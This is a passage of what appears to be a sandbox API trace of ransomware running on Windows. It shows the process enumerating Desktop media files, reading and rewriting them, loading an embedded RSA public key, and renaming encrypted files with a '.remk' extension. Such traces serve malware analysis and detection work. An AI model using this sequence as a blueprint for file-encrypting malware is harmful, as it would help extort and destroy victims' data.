hHeap=0x630000) returned 1 [0233.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0233.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0233.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0233.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0233.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0233.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3d0 [0233.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0233.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0233.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0233.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0233.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3e8 [0233.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0233.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0233.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0233.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3b8 [0233.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0233.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee448 [0233.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0233.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0233.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee418 [0233.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee400 [0233.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0233.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee460 [0233.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee400 | out: hHeap=0x630000) returned 1 [0233.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee400 [0233.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee418 | out: hHeap=0x630000) returned 1 [0233.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0233.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0233.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0233.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0233.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3d0 | out: hHeap=0x630000) returned 1 [0233.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3d0 [0233.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37b5b70 [0233.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee430 | out: hHeap=0x630000) returned 1 [0233.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0233.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee460 | out: hHeap=0x630000) returned 1 [0233.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5d80 [0233.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0233.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0233.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0233.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0233.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3d0 | out: hHeap=0x630000) returned 1 [0233.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5f98 [0233.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0233.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0233.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0233.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0233.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0233.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0233.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d80 | out: hHeap=0x630000) returned 1 [0233.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5f98 | out: hHeap=0x630000) returned 1 [0233.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0233.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0233.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee400 | out: hHeap=0x630000) returned 1 [0233.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0233.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee448 | out: hHeap=0x630000) returned 1 [0233.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0233.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3e8 | out: hHeap=0x630000) returned 1 [0233.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3b8 | out: hHeap=0x630000) returned 1 [0233.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0233.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0233.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0233.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3a0 | out: hHeap=0x630000) returned 1 [0233.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bb780 | out: hHeap=0x630000) returned 1 [0233.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0233.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0233.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0233.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0233.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0233.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0233.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0233.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.250] WriteFile (in: hFile=0x640, lpBuffer=0x37c2278*, nNumberOfBytesToWrite=0x11c52, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c2278*, lpNumberOfBytesWritten=0x3adfb14*=0x11c52, lpOverlapped=0x0) returned 1 [0233.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c2278 | out: hHeap=0x630000) returned 1 [0233.250] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x11c57, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.251] WriteFile (in: hFile=0x640, lpBuffer=0x31a4298*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31a4298*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0233.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0233.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0233.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0233.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0233.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0233.251] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0233.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.251] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.251] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.251] CloseHandle (hObject=0x640) returned 1 [0233.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e568 [0233.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x325d3b8 [0233.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e568 | out: hHeap=0x630000) returned 1 [0233.254] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\WOO6cFBQofqEBI.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\woo6cfbqofqebi.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\WOO6cFBQofqEBI.m4a.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\woo6cfbqofqebi.m4a.remk")) returned 1 [0233.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d3b8 | out: hHeap=0x630000) returned 1 [0233.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.255] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0233.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4610 | out: hHeap=0x630000) returned 1 [0233.257] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6238000, ftCreationTime.dwHighDateTime=0x1d5dbd7, ftLastAccessTime.dwLowDateTime=0x9b31b7a0, ftLastAccessTime.dwHighDateTime=0x1d5e695, ftLastWriteTime.dwLowDateTime=0x9b31b7a0, ftLastWriteTime.dwHighDateTime=0x1d5e695, nFileSizeHigh=0x0, nFileSizeLow=0xe742, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XOigXkWrr1j.mp3", cAlternateFileName="XOIGXK~1.MP3")) returned 1 [0233.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba510 [0233.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0233.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba510 | out: hHeap=0x630000) returned 1 [0233.257] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\XOigXkWrr1j.mp3") returned=".mp3" [0233.257] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\XOigXkWrr1j.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\xoigxkwrr1j.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.258] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=59202) returned 1 [0233.258] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.261] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xe71c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.261] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.263] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.263] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0233.263] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xe742, lpOverlapped=0x0) returned 1 [0233.265] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0233.265] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.265] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.265] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0233.266] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.266] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.266] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.266] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.266] GetLastError () returned 0x0 [0233.266] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.266] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0233.266] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.266] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.266] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.267] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe740) returned 0x37c2278 [0233.267] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0233.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0233.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0233.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0233.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb780 [0233.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3a0 [0233.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb7c8 [0233.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3b8 [0233.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3e8 [0233.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee448 [0233.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee400 [0233.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0233.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0233.268] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3e8 | out: hHeap=0x630000) returned 1 [0233.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee400 | out: hHeap=0x630000) returned 1 [0233.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee448 | out: hHeap=0x630000) returned 1 [0233.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0233.269] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee448 [0233.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0233.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee400 [0233.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0233.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee3e8 [0233.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0233.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31a4298 [0233.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0233.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0233.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0233.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0233.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0233.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee400 | out: hHeap=0x630000) returned 1 [0233.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3e8 | out: hHeap=0x630000) returned 1 [0233.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0233.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee448 | out: hHeap=0x630000) returned 1 [0233.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0233.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0233.270] GetCurrentThreadId () returned 0x314 [0233.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0233.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37b9ce0 [0233.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0233.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0233.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3192918 [0233.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0233.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0233.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.271] GetCurrentThreadId () returned 0x314 [0233.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: 